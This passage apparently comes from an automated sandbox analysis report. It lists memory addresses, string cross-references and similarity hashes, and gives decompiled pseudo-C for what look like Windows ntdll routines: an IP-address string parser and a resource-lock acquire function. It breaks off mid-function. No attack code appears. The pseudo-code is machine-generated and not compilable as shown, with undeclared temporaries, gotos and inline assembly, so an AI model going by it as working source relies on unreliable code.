                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0210e32f
                                                                                                                                                                                                          0x0210e32f
                                                                                                                                                                                                          0x0210e337
                                                                                                                                                                                                          0x0210e33a
                                                                                                                                                                                                          0x0210e33b
                                                                                                                                                                                                          0x0210e33d
                                                                                                                                                                                                          0x0210e33f
                                                                                                                                                                                                          0x0210e341
                                                                                                                                                                                                          0x0210e341
                                                                                                                                                                                                          0x0210e34e
                                                                                                                                                                                                          0x0210e353
                                                                                                                                                                                                          0x0210e358
                                                                                                                                                                                                          0x0210e35d
                                                                                                                                                                                                          0x0210e35f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0210e365
                                                                                                                                                                                                          0x0210e365
                                                                                                                                                                                                          0x0210e368
                                                                                                                                                                                                          0x0210e36e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0210e374
                                                                                                                                                                                                          0x0210e32f
                                                                                                                                                                                                          0x02103f75
                                                                                                                                                                                                          0x02103f7a
                                                                                                                                                                                                          0x02103f7c
                                                                                                                                                                                                          0x02103f7e
                                                                                                                                                                                                          0x02103f86
                                                                                                                                                                                                          0x020e7f39
                                                                                                                                                                                                          0x020e7f47
                                                                                                                                                                                                          0x020e7f47
                                                                                                                                                                                                          0x020e7f37
                                                                                                                                                                                                          0x020e7f37
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02103F12
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • ExecuteOptions, xrefs: 02103F04
                                                                                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 0210E345
                                                                                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0210E2FB
                                                                                                                                                                                                          • Execute=1, xrefs: 02103F5E
                                                                                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02103F75
                                                                                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02103F4A
                                                                                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02103EC4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: BaseDataModuleQuery
                                                                                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                          • API String ID: 3901378454-484625025
                                                                                                                                                                                                          • Opcode ID: b6cd7998fb5ca2f2ae6b156b77f09d9031a58bc4864ba47e491ddb04d473273e
                                                                                                                                                                                                          • Instruction ID: 2e74d764a87bf4877062ed67944a844692905875f6a54130b674b7ae56a885d9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6cd7998fb5ca2f2ae6b156b77f09d9031a58bc4864ba47e491ddb04d473273e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9141C871A8031C7EEF21DA94DCC5FDBB3BDAF14704F0005A9E516E6090EB70AA859F65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E020F0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                          				void* _t108;
                                                                                                                                                                                                          				void* _t116;
                                                                                                                                                                                                          				char _t120;
                                                                                                                                                                                                          				short _t121;
                                                                                                                                                                                                          				void* _t128;
                                                                                                                                                                                                          				intOrPtr* _t130;
                                                                                                                                                                                                          				char _t132;
                                                                                                                                                                                                          				short _t133;
                                                                                                                                                                                                          				intOrPtr _t141;
                                                                                                                                                                                                          				signed int _t156;
                                                                                                                                                                                                          				signed int _t174;
                                                                                                                                                                                                          				intOrPtr _t177;
                                                                                                                                                                                                          				intOrPtr* _t179;
                                                                                                                                                                                                          				intOrPtr _t180;
                                                                                                                                                                                                          				void* _t183;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t179 = _a4;
                                                                                                                                                                                                          				_t141 =  *_t179;
                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                          				_v32 = 0;
                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                          				if(_t141 == 0) {
                                                                                                                                                                                                          					L41:
                                                                                                                                                                                                          					 *_a8 = _t179;
                                                                                                                                                                                                          					_t180 = _v24;
                                                                                                                                                                                                          					if(_t180 != 0) {
                                                                                                                                                                                                          						if(_t180 != 3) {
                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t174 = _v32;
                                                                                                                                                                                                          					if(_t174 == 0) {
                                                                                                                                                                                                          						if(_v8 == 7) {
                                                                                                                                                                                                          							goto L43;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L43:
                                                                                                                                                                                                          					if(_v16 != 1) {
                                                                                                                                                                                                          						if(_v16 != 2) {
                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                                                                          						L47:
                                                                                                                                                                                                          						if(_t174 != 0) {
                                                                                                                                                                                                          							E020C8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                                                                          							_t116 = 8;
                                                                                                                                                                                                          							E020BDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t180 != 0) {
                                                                                                                                                                                                          						if(_v12 > 3) {
                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t120 = E020F0CFA(_v28, 0, 0xa);
                                                                                                                                                                                                          						_t183 = _t183 + 0xc;
                                                                                                                                                                                                          						if(_t120 > 0xff) {
                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                                                                          						goto L47;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_v12 > 4) {
                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t121 = E020F0CFA(_v28, _t180, 0x10);
                                                                                                                                                                                                          					_t183 = _t183 + 0xc;
                                                                                                                                                                                                          					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                                                                          					goto L47;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                          						_t123 = _v16;
                                                                                                                                                                                                          						if(_t123 == 0) {
                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t108 = _t123 - 1;
                                                                                                                                                                                                          						if(_t108 != 0) {
                                                                                                                                                                                                          							goto L1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t178 = _t141;
                                                                                                                                                                                                          						if(E020F06BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                                                                          							if(E020F06BA(_t135, _t178) == 0 || E020F0A5B(_t136, _t178) == 0) {
                                                                                                                                                                                                          								if(_t141 != 0x3a) {
                                                                                                                                                                                                          									if(_t141 == 0x2e) {
                                                                                                                                                                                                          										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                                                                          											goto L41;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_v24 = _v24 + 1;
                                                                                                                                                                                                          											L27:
                                                                                                                                                                                                          											_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                          											L28:
                                                                                                                                                                                                          											if(_v28 == 0) {
                                                                                                                                                                                                          												goto L20;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t177 = _v24;
                                                                                                                                                                                                          											if(_t177 != 0) {
                                                                                                                                                                                                          												if(_v12 > 3) {
                                                                                                                                                                                                          													L6:
                                                                                                                                                                                                          													return 0xc000000d;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t132 = E020F0CFA(_v28, 0, 0xa);
                                                                                                                                                                                                          												_t183 = _t183 + 0xc;
                                                                                                                                                                                                          												if(_t132 > 0xff) {
                                                                                                                                                                                                          													goto L6;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                                                                          												goto L20;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											if(_v12 > 4) {
                                                                                                                                                                                                          												goto L6;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t133 = E020F0CFA(_v28, 0, 0x10);
                                                                                                                                                                                                          											_t183 = _t183 + 0xc;
                                                                                                                                                                                                          											_v20 = _v20 + 1;
                                                                                                                                                                                                          											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                                                                          											goto L20;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L41;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                                                                          									goto L41;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t130 = _t179 + 1;
                                                                                                                                                                                                          									if( *_t130 == _t141) {
                                                                                                                                                                                                          										if(_v32 != 0) {
                                                                                                                                                                                                          											goto L41;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_v32 = _v8 + 1;
                                                                                                                                                                                                          										_t156 = 2;
                                                                                                                                                                                                          										_v8 = _v8 + _t156;
                                                                                                                                                                                                          										L34:
                                                                                                                                                                                                          										_t179 = _t130;
                                                                                                                                                                                                          										_v16 = _t156;
                                                                                                                                                                                                          										goto L28;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_v8 = _v8 + 1;
                                                                                                                                                                                                          									goto L27;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_v12 = _v12 + 1;
                                                                                                                                                                                                          								if(_v24 > 0) {
                                                                                                                                                                                                          									goto L41;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_a7 = 1;
                                                                                                                                                                                                          								goto L20;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_v12 = _v12 + 1;
                                                                                                                                                                                                          							L20:
                                                                                                                                                                                                          							_t179 = _t179 + 1;
                                                                                                                                                                                                          							_t141 =  *_t179;
                                                                                                                                                                                                          							if(_t141 == 0) {
                                                                                                                                                                                                          								goto L41;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L7:
                                                                                                                                                                                                          						if(_t141 == 0x3a) {
                                                                                                                                                                                                          							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                                                                          								goto L41;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t130 = _t179 + 1;
                                                                                                                                                                                                          								if( *_t130 != _t141) {
                                                                                                                                                                                                          									goto L41;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_v20 = _v20 + 1;
                                                                                                                                                                                                          								_t156 = 2;
                                                                                                                                                                                                          								_v32 = 1;
                                                                                                                                                                                                          								_v8 = _t156;
                                                                                                                                                                                                          								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                                                                          								goto L34;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                          						if(_v8 > 7) {
                                                                                                                                                                                                          							goto L41;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t142 = _t141;
                                                                                                                                                                                                          						if(E020F06BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                                                                          							if(E020F06BA(_t124, _t142) == 0 || E020F0A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                                                                          								goto L41;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t128 = 1;
                                                                                                                                                                                                          								_a7 = 1;
                                                                                                                                                                                                          								_v28 = _t179;
                                                                                                                                                                                                          								_v16 = 1;
                                                                                                                                                                                                          								_v12 = 1;
                                                                                                                                                                                                          								L39:
                                                                                                                                                                                                          								if(_v16 == _t128) {
                                                                                                                                                                                                          									goto L20;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L28;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_a7 = 0;
                                                                                                                                                                                                          							_v28 = _t179;
                                                                                                                                                                                                          							_v16 = 1;
                                                                                                                                                                                                          							_v12 = 1;
                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L1:
                                                                                                                                                                                                          				_t123 = _t108 == 1;
                                                                                                                                                                                                          				if(_t108 == 1) {
                                                                                                                                                                                                          					goto L8;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t128 = 1;
                                                                                                                                                                                                          				goto L39;
                                                                                                                                                                                                          			}

























                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0c1d
                                                                                                                                                                                                          0x020f0c20
                                                                                                                                                                                                          0x020f0c21
                                                                                                                                                                                                          0x020f0c24
                                                                                                                                                                                                          0x020f0c24
                                                                                                                                                                                                          0x020f0c26
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0c26
                                                                                                                                                                                                          0x020f0bcd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0bcd
                                                                                                                                                                                                          0x020f0b89
                                                                                                                                                                                                          0x020f0b89
                                                                                                                                                                                                          0x020f0b90
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0b96
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0b96
                                                                                                                                                                                                          0x020f0a04
                                                                                                                                                                                                          0x020f0a04
                                                                                                                                                                                                          0x020f0b9a
                                                                                                                                                                                                          0x020f0b9a
                                                                                                                                                                                                          0x020f0b9b
                                                                                                                                                                                                          0x020f0b9f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0ba5
                                                                                                                                                                                                          0x020f0ac7
                                                                                                                                                                                                          0x020f0aca
                                                                                                                                                                                                          0x0211eacf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eade
                                                                                                                                                                                                          0x0211eade
                                                                                                                                                                                                          0x0211eae3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eaf3
                                                                                                                                                                                                          0x0211eaf6
                                                                                                                                                                                                          0x0211eaf7
                                                                                                                                                                                                          0x0211eafe
                                                                                                                                                                                                          0x0211eb01
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eb01
                                                                                                                                                                                                          0x0211eacf
                                                                                                                                                                                                          0x020f0ad0
                                                                                                                                                                                                          0x020f0ad4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0ada
                                                                                                                                                                                                          0x020f0ae6
                                                                                                                                                                                                          0x020f0c34
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0c47
                                                                                                                                                                                                          0x020f0c49
                                                                                                                                                                                                          0x020f0c4a
                                                                                                                                                                                                          0x020f0c4e
                                                                                                                                                                                                          0x020f0c51
                                                                                                                                                                                                          0x020f0c54
                                                                                                                                                                                                          0x020f0c57
                                                                                                                                                                                                          0x020f0c5a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0c60
                                                                                                                                                                                                          0x020f0afb
                                                                                                                                                                                                          0x020f0afe
                                                                                                                                                                                                          0x020f0b02
                                                                                                                                                                                                          0x020f0b05
                                                                                                                                                                                                          0x020f0b08
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x020f0b08
                                                                                                                                                                                                          0x020f0ae6
                                                                                                                                                                                                          0x020f0b44
                                                                                                                                                                                                          0x020f09f8
                                                                                                                                                                                                          0x020f09f8
                                                                                                                                                                                                          0x020f09f9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0211eaa0
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000007.00000002.2376022456.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376017076.0000000002090000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376136233.0000000002180000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376141520.0000000002190000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376146433.0000000002194000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376150887.0000000002197000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376156087.00000000021A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000007.00000002.2376198013.0000000002200000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __fassign
                                                                                                                                                                                                          • String ID: .$:$:
                                                                                                                                                                                                          • API String ID: 3965848254-2308638275
                                                                                                                                                                                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                                          • Instruction ID: c5d56884104f9ae7a5ac78f71af82edcdb178524a845c2e07e25239df6a88aee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34A1D371D8030ADFCFA5CF54C8447BEB7B7AF44308F24846ADA06A7A4AD7305645EB91
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                          			E020F0554(signed int _a4, char _a8) {
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int* _t49;
                                                                                                                                                                                                          				signed int _t51;
                                                                                                                                                                                                          				signed int _t56;
                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                          				signed int _t63;
                                                                                                                                                                                                          				void* _t66;
                                                                                                                                                                                                          				intOrPtr _t67;
                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                                          				void* _t75;
                                                                                                                                                                                                          				signed int _t81;
                                                                                                                                                                                                          				signed int _t84;
                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                          				signed int _t93;
                                                                                                                                                                                                          				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x021901c0;
									_push(_t144);
									_push(0);
									_t51 = E020AF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E020F4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02103F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02103F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0213217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02103F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E020F3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x021901c0;
												_push(_t138);
												_push(0);
												_t58 = E020AF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E020F4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02103F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02103F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0213217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02103F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E020F3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E020D5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E020AF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
                                                                                                                                                                                                          													if(__eflags >= 0) {
                                                                                                                                                                                                          														goto L1;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														_push(_t70);
                                                                                                                                                                                                          														E020F3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                                                                          														L52:
                                                                                                                                                                                                          														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                                                                          														_push( &_a4);
                                                                                                                                                                                                          														_push(1);
                                                                                                                                                                                                          														_t63 = E020AF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                                                                          														__eflags = _t63;
                                                                                                                                                                                                          														if(__eflags >= 0) {
                                                                                                                                                                                                          															L2:
                                                                                                                                                                                                          															return _t63;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															_push(_t63);
                                                                                                                                                                                                          															E020F3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                                                                          															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                                                                          															_push( &_a4);
                                                                                                                                                                                                          															_push(1);
                                                                                                                                                                                                          															_t63 = E020AF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                                                                          															__eflags = _t63;
                                                                                                                                                                                                          															if(__eflags >= 0) {
                                                                                                                                                                                                          																goto L2;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																_push(_t63);
                                                                                                                                                                                                          																_t66 = E020F3915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                                                                          																asm("int3");
                                                                                                                                                                                                          																while(1) {
                                                                                                                                                                                                          																	_t110 = _t66;
                                                                                                                                                                                                          																	__eflags = _t66 - 1;
                                                                                                                                                                                                          																	if(_t66 != 1) {
                                                                                                                                                                                                          																		break;
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                                                                          																	_t66 = _t110;
                                                                                                                                                                                                          																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                                                                          																	__eflags = _t66 - _t110;
                                                                                                                                                                                                          																	if(_t66 != _t110) {
                                                                                                                                                                                                          																		continue;
                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                          																		_t67 =  *[fs:0x18];
                                                                                                                                                                                                          																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                                                                          																		return _t67;
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																	goto L59;
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          																E020D5329(_t110, _t138);
                                                                                                                                                                                                          																_t69 = E020D53A5(_t138, 1);
                                                                                                                                                                                                          																return _t69;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												_t56 =  *(_t96 + 0x28);
                                                                                                                                                                                                          												goto L3;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t107 =  *_t119;
                                                                                                                                                                                                          											__eflags = _t107;
                                                                                                                                                                                                          											if(__eflags > 0) {
                                                                                                                                                                                                          												while(1) {
                                                                                                                                                                                                          													_t81 = _t107;
                                                                                                                                                                                                          													asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                                          													__eflags = _t81 - _t107;
                                                                                                                                                                                                          													if(_t81 == _t107) {
                                                                                                                                                                                                          														break;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													_t107 = _t81;
                                                                                                                                                                                                          													__eflags = _t81;
                                                                                                                                                                                                          													if(_t81 > 0) {
                                                                                                                                                                                                          														continue;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													break;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t56 = _a4;
                                                                                                                                                                                                          												__eflags = _t107;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                          												while(1) {
                                                                                                                                                                                                          													L3:
                                                                                                                                                                                                          													__eflags = _t56;
                                                                                                                                                                                                          													if(_t56 != 0) {
                                                                                                                                                                                                          														goto L32;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													_t107 = _t107 | 0xffffffff;
                                                                                                                                                                                                          													_t56 = 0;
                                                                                                                                                                                                          													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                          													__eflags = 0;
                                                                                                                                                                                                          													if(0 != 0) {
